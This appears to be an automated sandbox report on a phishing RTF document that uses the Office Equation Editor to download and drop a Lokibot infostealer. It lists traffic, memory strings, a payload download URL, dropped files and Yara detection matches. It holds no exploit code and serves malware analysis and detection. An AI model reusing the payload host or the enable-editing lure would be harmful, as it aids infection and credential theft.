Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDWKhb4y48HkO2eV477ic%2BPQ3TNoEdUAz%2FeyPDwYK9FFbqRb3o9wOfxBH587hBJpOswpKBZdrzXL%2FozFoAZfR8Vglx5X9xMNCnlmR6p8G4pUbd6Ed%2ByMdIxc2i%2FiGnYmwtnd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d98dcbd43c2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4A3w6EhOrGlHxkDf1fljwTAe9K1CA6Fj14fuL8t1bO4BuQ4CqRk1MbUBzYhjyJYaw6eEnMcfEiorIYXkSdNGwrl5UYfAmJ846yTzapNXLfC0VvoDW1cNkB%2FGI16Ell0Cxdd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d9ebf350f7d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfH%2F2BVpjSen2eyktv1BYCPUDFXtQxn3KpP4F9EwmF%2FpGNJP2lvbmrqIFTdvNpzHn%2FBGQTrQ%2B0xCYfbEmd%2BFuH1ZDtC6xk%2Ba1bxlgSfloXz3%2BWCmJCVyI5dcMleVAFZYoG19"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870da3a9d48c75-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFhwP2H%2BOS5aCEOLuYOThMMa498qI5eWf%2F2BIAL1yiv305Hw2OBPHrpxDwvW4BkBMFGYJ5FrrQU3pkrBQ%2FGu75qS0HnDCSqOaLgZlfCr5YxGUkSfVMA9mYI%2Fqq%2BFaN7NnmOR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870da92fb77288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1k06TqmMpfmAdQ55cmQPUDY0UHc8UvEa%2FqwjX4bImXFfZsrXLkcVsGptiCFg5xqG128v6YYH%2F7IUm5HHJiX3MDbv8QxFpcWAHiFmQEh%2BJlGNSxMcEZKxTaDeGCXTbK982PN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870dadfe3641ed-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: sharon38892.exe, 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, XxENUzWteJXT.exe, 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	String found in binary or memory: http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: XxENUzWteJXT.exe, XxENUzWteJXT.exe, 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://universalmovies.top/
Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://universalmovies.top/sharonzx.exe
Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://universalmovies.top/sharonzx.exej
Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://universalmovies.top/sharonzx.exemmC:
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://universalmovies.top/sharonzx.exeoC:
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Source: unknown

HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: SCB REmittance Advice.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state

.NET source code contains very large strings

Source: sharonzx[1].exe.2.dr, BufferingPage.cs	Long String: Length: 150953
Source: sharon38892.exe.2.dr, BufferingPage.cs	Long String: Length: 150953
Source: XxENUzWteJXT.exe.5.dr, BufferingPage.cs	Long String: Length: 150953

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\sharon38892.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00255348	5_2_00255348
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_002504B4	5_2_002504B4
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00255808	5_2_00255808
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00259879	5_2_00259879
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00251A10	5_2_00251A10
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00251E8B	5_2_00251E8B
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00259150	5_2_00259150
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025D218	5_2_0025D218
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00255344	5_2_00255344
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00252358	5_2_00252358
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025C4A0	5_2_0025C4A0
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025C8F8	5_2_0025C8F8
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025DCF0	5_2_0025DCF0
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025CD20	5_2_0025CD20
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025CD30	5_2_0025CD30
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00250D78	5_2_00250D78
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00251E03	5_2_00251E03
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00251E18	5_2_00251E18
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00175348	14_2_00175348
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_001704B4	14_2_001704B4
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00175808	14_2_00175808
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00179879	14_2_00179879
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00171A10	14_2_00171A10
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00171E8B	14_2_00171E8B
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00179150	14_2_00179150
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017D218	14_2_0017D218
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00172358	14_2_00172358
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00175344	14_2_00175344
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017C4A0	14_2_0017C4A0
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017C8F8	14_2_0017C8F8
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017C8E9	14_2_0017C8E9
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017DCF0	14_2_0017DCF0
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017CD30	14_2_0017CD30
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017CD20	14_2_0017CD20
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00170D78	14_2_00170D78
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00171E18	14_2_00171E18
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00171E03	14_2_00171E03
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 21_2_0040549C	21_2_0040549C
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 21_2_004029D4	21_2_004029D4

Source: tmp5C05.tmp.5.dr	OLE indicator, VBA macros: true
Source: tmp7D2B.tmp.14.dr	OLE indicator, VBA macros: true

Source: tmp5C05.tmp.5.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: tmp7D2B.tmp.14.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\user\AppData\Roaming\sharon38892.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: SCB REmittance Advice.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
